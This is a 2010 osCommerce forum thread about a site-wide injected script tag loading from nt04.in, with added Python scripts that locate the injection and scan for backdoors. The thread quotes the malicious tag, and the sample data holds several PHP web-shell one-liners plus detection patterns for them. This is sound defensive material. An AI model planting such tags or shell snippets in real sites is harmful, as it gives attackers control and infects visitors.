coves Posted September 22, 2010 My site has been hacked... I have removed <script src="http://nt04.in/3"> from many many pages (must be some automated task attacking my pages) but am having trouble finding the script in the links shown below. The script is not in "product_reviews" or "currency".... can someone help me understand how I find this malware script from the URLs shown below.... right now Google has me tagged as a malware site, search engines have me shut down.... www.mysite/product_reviews.php?currency=EUR&products_id=41 www.mysite/product_reviews_info.php?products_id=43&reviews_id=11 Thanks Coves
germ Posted September 22, 2010 How to Secure Your Site If you PM your URL I can probably help pinpoint what files you should be looking in. Or maybe you can do it yourself. Look at the HTML source. There are comments in the source like this: <!-- header //--> ... (much HTML here) <!-- header_eof //--> that tell you when you enter and exit a file. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help
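The marker trick above can be automated. The following is an added example, not code from the thread or from osCommerce: given the HTML of an infected page, it walks the `<!-- name //-->` / `<!-- name_eof //-->` markers up to the injected tag and reports which section the tag sits in, or, when an injector appended the tag after a file's closing marker, which marker it follows. The two sample pages are constructed here to mimic a stock osCommerce 2.2 layout (header, left_navigation, boxes such as categories, body, footer); the marker names and the grep it suggests are assumptions about that layout, so check them against your own source.

```python
import re

# Matches the osCommerce 2.2 template markers that each include emits around
# its output, e.g. <!-- header //--> ... <!-- header_eof //-->.
MARKER_RE = re.compile(r'<!--\s*(\w+?)(_eof)?\s*//-->')

# Constructed sample pages (not from the thread). The injected tag is the one
# reported in the thread; the layout is assumed to follow a stock osCommerce 2.2 page.
SAMPLE_NESTED = """<html><body>
<!-- header //-->
<div>header</div>
<!-- header_eof //-->
<!-- left_navigation //-->
<!-- categories //-->
<ul><li>Hardware</li></ul><script src="http://nt04.in/3"></script>
<!-- categories_eof //-->
<!-- left_navigation_eof //-->
<!-- body //-->
<p>product reviews</p>
<!-- body_eof //-->
</body></html>
"""

# An injector that appends to the end of a file lands the tag after the
# closing marker: the "inside" stack is then empty and the last marker passed
# is the clue instead.
SAMPLE_APPENDED = """<html><body>
<!-- footer //-->
<p>footer</p>
<!-- footer_eof //-->
<script src="http://nt04.in/3"></script>
</body></html>
"""


def locate_in_sections(html, needle):
    """Return where the first occurrence of needle sits relative to the
    template markers: the stack of sections still open at that point
    (outermost first) and the last marker passed. None if needle is absent."""
    pos = html.find(needle)
    if pos < 0:
        return None
    stack, last = [], None
    for m in MARKER_RE.finditer(html):
        if m.start() > pos:
            break
        name, is_eof = m.group(1), m.group(2) is not None
        last = name + ("_eof" if is_eof else "")
        if is_eof:
            if stack and stack[-1] == name:
                stack.pop()
        else:
            stack.append(name)
    return {"inside": stack, "after_marker": last}


def grep_hint(location):
    """Build the grep to run over the site tree to find the file that emits the
    marker nearest the injected tag: the innermost open section, or, when the
    tag sits outside every section, the marker just before it."""
    if location is None:
        return None
    marker = location["inside"][-1] if location["inside"] else location["after_marker"]
    if marker is None:
        return None
    return f"grep -rl -- '<!-- {marker} //-->' ."


if __name__ == "__main__":
    for name, page in (("nested", SAMPLE_NESTED), ("appended", SAMPLE_APPENDED)):
        loc = locate_in_sections(page, "nt04.in/3")
        print(name, loc, grep_hint(loc))
```

Save the page source from your browser, run the script against it with the injected host as the needle, then run the suggested grep in the site root (over FTP'd files or in a shell on the host) to get the include that emits that marker. An empty "inside" list with an `_eof` marker means the tag was appended past the end of that include's output, so look at the tail of that file and of the page script itself.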
keithro Posted September 22, 2010 I'm experiencing the exact same thing right now.... any public help would be greatly appreciated also!
germ Posted September 22, 2010 How to Secure Your Site Click it. Without your URL that's as good as it gets.
coves (Author) Posted September 23, 2010 germ, I sent you a PM email with more info Cheers Coves
germ Posted September 23, 2010 germ, I sent you a PM email with more info Cheers Coves No PM received - Yet.
nicole zhang Posted September 23, 2010 My site has been hacked... I have removed <script src="http://nt04.in/3"> from many many pages (must be some automated task attacking my pages) but am having trouble finding the script in the links shown below. The script is not in "product_reviews" or "currency".... can someone help me understand how I find this malware script from the URLs shown below.... right now Google has me tagged as a malware site, search engines have me shut down.... www.mysite/product_reviews.php?currency=EUR&products_id=41 www.mysite/product_reviews_info.php?products_id=43&reviews_id=11 Thanks Coves Hello Coves, I went through the same awful experience just the day before yesterday. I searched almost everywhere to find a solution, including removing the automatically added code manually, but it would be added again. Here is a way to remove it quickly: Please log in to your account on www.godaddy.com and restore your website to any day in the past month, for example 2010.09.20. You can see how to restore it here: http://help.godaddy.com/article/5091. Hope this can help you, Nicole.
coves (Author) Posted September 23, 2010 germ, did you get my PM? Nicole, I am not hosted with GoDaddy, thanks very much though, it looks like you need to be with them for your solution. Thanks for the help, I need to clean out those 2 files urgently to get back up and running, and then add some security patches to reduce the chance of it happening again. Coves
coves (Author) Posted September 24, 2010 Just an update, did a lot of clean up work, FTP'd my entire site to my computer, did a search and replace using GrepWin (works fantastic!) to replace the injected script with 'nothing', over 344 occurrences, verified findings using "File Hound 3.08".... and pushed the entire site back to the hosting server. So everything should be clean, as long as I didn't miss any files during the FTP process since that was not 100% clean, had to re-do manually several areas. I have re-submitted a review request with Google, we'll see what happens, keep my fingers crossed... Next step is to add security code per the link from germ... I think this is similar to what Nicole was suggesting except without using the hosting provider's plug, thanks Nicole!
mdtaylorlrim Posted September 24, 2010 Next step is to add security code per the link from germ... I think this is similar to what Nicole was suggesting except without using the hosting provider's plug, thanks Nicole! You should have done that before you uploaded the new, clean files back to your server. You would be amazed at how fast the hackers can find and infect your site... Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...?
troubleshooter2000 Posted October 1, 2010 Oh. God.. I am having the same problem and I did a lot of updates in the past week. The last backup I have is from 24 Sep and if I restore that it would set me back quite a bit... germ, please help. I am PM-ing my URL to you...
paeonia Posted October 2, 2010 I am having the same problem. So sorry to bother you, germ, but could you please help me too? How do I PM my URL to you?
coves (Author) Posted October 2, 2010 Please read what I had to do to correct the issue, you do not have to restore your site from an old backup if it is not up to date. Try to FTP your site to a safe location on your PC, scan and clean all your files using the programs suggested above and then FTP your clean site back to your host. Request a review from Google, and it will likely be cleared by the next day. You should also look at installing some security code, which I have done. This works and it's not as bad as it sounds. Hope this helps. Not to knock germ, but I did not get any help from him and I think that because the work comes back to you, you have to help yourself by doing the clean up. Cheers! Coves
germ Posted October 3, 2010 Please read what I had to do to correct the issue, you do not have to restore your site from an old backup if it is not up to date. Try to FTP your site to a safe location on your PC, scan and clean all your files using the programs suggested above and then FTP your clean site back to your host. Request a review from Google, and it will likely be cleared by the next day. You should also look at installing some security code, which I have done. This works and it's not as bad as it sounds. Hope this helps. Not to knock germ, but I did not get any help from him and I think that because the work comes back to you, you have to help yourself by doing the clean up. Cheers! Coves I went to your site (multiple pages and times) and I could never see what you posted in the HTML source or anything else that even remotely looked like malware, so just what did you expect of me? :unsure: The truth is that someone who can't recognize rogue code is going to have a difficult time cleaning a site. I wouldn't trust virus scanners on a Windows PC to clean a site - that's a whole other world compared to a UNIX-driven website. What is considered a "virus" on a UNIX website may be just another text file to a Windows virus scanner. @paeonia I went to your site and it tried to infect my machine... :blush:
coves (Author) Posted October 3, 2010 Hey germ. I really appreciate the feedback. Just for the record, once I FTP'd my site to my PC, I scanned all .php and other files for the text script that I posted previously <script src="http://nt04.in/3">, these programs found approx 400 files infected with this script, so all I had to do was a swap and replace to remove the script. Like you said though, it was very difficult to find every occurrence using the file manager in cPanel and that is why I started looking for help, needed help finding the files that didn't appear to have the script but were being reported as having it, and help to find something that could potentially scan and remove it right on the site versus FTP'ing it to my computer. Thanks again germ, you did help, you gave me that push to keep going! Cheers Coves
Juack Posted October 12, 2010 First of all you have to detect which vulnerability has been exploited. You can do it by a forensic analysis (more appropriate) or by a vulnerability scan. After that you can restore an old backup, resolve the vuln and perform an additional vulnerability scan.
sucuri Posted October 13, 2010 I said that in a few posts already, but I will repeat :) Check for backdoors! We have been checking / fixing many osCommerce sites and all of them had many hidden ones, inside /images, inside /js, etc. Also check for spam inside your application_bottom.php. We posted some details here: blog.sucuri.net/2010/10/oscommerce-attacks-kirm-sky-ru.html Thanks,
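The two halves of the cleanup discussed in this thread, the search-and-replace that coves did with GrepWin and the backdoor hunt in /images, /js and application_bottom.php that sucuri describes, fit in one script that runs over a downloaded copy of the site. This is an added example, not code from the thread, from osCommerce or from Sucuri. It strips the injected tag reported in the thread (tolerating the quoting and whitespace variants an automated injector produces), reports PHP that hides in static-asset directories under any file name, and flags a few web-shell constructs in .php files; the backdoor signatures and directory list are assumptions and not a complete set. The sample site tree is constructed inside a temp directory so the script runs offline.

```python
import os
import re
import tempfile

# The tag reported in the thread. The pattern also catches the variants an
# automated injector leaves behind: single or no quotes, extra whitespace,
# a closing </script>.
INJECTED_HOST = "nt04.in"
INJECT_RE = re.compile(
    r'<script\s+src=["\']?https?://' + re.escape(INJECTED_HOST)
    + r'[^"\'>]*["\']?\s*>\s*(?:</script>)?',
    re.IGNORECASE,
)

# Directories that should hold only static assets: PHP found there is a
# backdoor candidate whatever the file is called (assumed list).
STATIC_DIRS = {"images", "js", "css"}
# Constructs typical of PHP web shells (assumed signatures, not a full list).
BACKDOOR_RE = re.compile(
    r'eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(|'
    r'preg_replace\s*\([^)]*/e["\']|'
    r'\b(?:system|passthru|shell_exec|exec)\s*\(\s*\$_(?:GET|POST|REQUEST)',
    re.IGNORECASE,
)
TEXT_EXT = {".php", ".html", ".htm", ".js", ".tpl", ".txt"}
# latin-1 round-trips every byte, so rewriting a file changes only what we strip.
ENC = "latin-1"


def strip_injected_script(text):
    """Remove every injected tag from text; return (clean_text, removed_count)."""
    return INJECT_RE.subn("", text)


def scan_tree(root):
    """Walk root and report injected files and backdoor candidates as sorted
    paths relative to root. Nothing is modified."""
    infected, backdoors = set(), set()
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        top = "" if rel_dir == "." else rel_dir.split(os.sep)[0]
        for fn in files:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(fn)[1].lower()
            with open(path, "rb") as fh:
                raw = fh.read()
            text = raw.decode(ENC)
            if top in STATIC_DIRS and (ext == ".php" or b"<?php" in raw):
                backdoors.add(rel)  # PHP hiding among images/js, e.g. a fake .jpg
            if ext in TEXT_EXT and INJECT_RE.search(text):
                infected.add(rel)
            if ext == ".php" and BACKDOOR_RE.search(text):
                backdoors.add(rel)
    return {"infected": sorted(infected), "backdoors": sorted(backdoors)}


def clean_tree(root):
    """Strip the injected tag in place from every text file under root and
    return the number of tags removed. Backdoor candidates are deliberately
    left alone: they need a human look, not a regex."""
    removed = 0
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if os.path.splitext(fn)[1].lower() not in TEXT_EXT:
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding=ENC) as fh:
                data = fh.read()
            clean, n = strip_injected_script(data)
            if n:
                with open(path, "w", encoding=ENC) as fh:
                    fh.write(clean)
                removed += n
    return removed


def build_sample_site():
    """Write a constructed osCommerce-like tree (sample data, not a real site)
    into a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="osc_")
    files = {
        "product_reviews.php": "<?php require('includes/application_top.php'); ?>\n"
                               '<html><body>reviews</body></html>\n<script src="http://nt04.in/3"></script>\n',
        "includes/footer.php": "<!-- footer //-->\n<p>footer</p><script src='http://nt04.in/3' ></script>\n"
                               "<!-- footer_eof //-->\n<script src=http://nt04.in/3>\n",
        "includes/application_bottom.php": "<?php\nif (isset($_GET['cmd'])) { system($_GET['cmd']); }\n",
        "images/logo.gif": "GIF89a\x00\x00",
        "images/banners/up.php": "<?php eval(base64_decode($_POST['x'])); ?>",
        "js/general.js": "function f() {}\n",
        "js/thumb.jpg": "\xff\xd8\xff<?php @system($_REQUEST['c']); ?>",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding=ENC, newline="") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    print("before:", scan_tree(site))
    print("removed", clean_tree(site), "tags")
    print("after: ", scan_tree(site))
```

Run scan_tree first and read the backdoor list before touching anything: stripping the tag removes the symptom only, and as Juack and mdtaylorlrim point out above, a tree uploaded with the entry point still open and a shell still sitting in /images will be reinfected quickly. Keep the downloaded copy as evidence, diff it against a known-good install where possible, and only push the cleaned tree back once the candidates have been examined by hand.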